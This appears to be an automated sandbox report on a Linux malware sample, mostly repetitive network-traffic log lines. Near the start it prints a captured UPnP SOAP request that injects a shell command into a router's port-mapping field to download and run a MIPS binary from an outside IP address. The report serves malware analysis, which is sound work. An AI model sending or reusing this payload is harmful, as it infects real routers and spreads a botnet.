Source: unknown TCP traffic detected without corresponding DNS query: 36.177.60.96
Source: unknown TCP traffic detected without corresponding DNS query: 2.43.172.163
Source: unknown TCP traffic detected without corresponding DNS query: 177.65.50.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.42.224.4
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 12:07:47 GMTContent-Type: text/htmlServer: lighttpd/1.4.13Content-Length: 399
Source: swOGb2sZYt, 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp String found in binary or memory: http://194.87.42.3/Anti_Bins/Antisocial.mips
Source: swOGb2sZYt, 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: swOGb2sZYt, 5245.1.00000000cd92e3cf.00000000eb405220.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknown HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 38 37 2e 34 32 2e 33 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://194.87.42.3/Anti_Bins/Antisocial.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDurati

System Summary:

barindex
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal76.troj.lin@0/0@0/0
Source: swOGb2sZYt Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 47692 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52122 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52122
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52126
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42036 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42038 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52784 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52786 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52784
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52786
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45784 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45862 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45708 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 45708
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 45714
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59300 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59310 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57730 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57732 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51942 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51944 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35340 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35342 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54366 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44238
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55986
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44272
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55994 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55994
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44284
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44298
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34636 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59940 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59972 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44306
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49646 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44382
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44408
Source: unknown Network traffic detected: HTTP traffic on port 59242 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44422
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 43982 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44446
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 44502
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48904 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48908 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 48950 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48956 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36620 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 36624 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35256 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41356 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 41358 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35384 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35484 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55468 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55468
Source: unknown Network traffic detected: HTTP traffic on port 55476 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 55476
Source: unknown Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44976 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42590 -> 52869
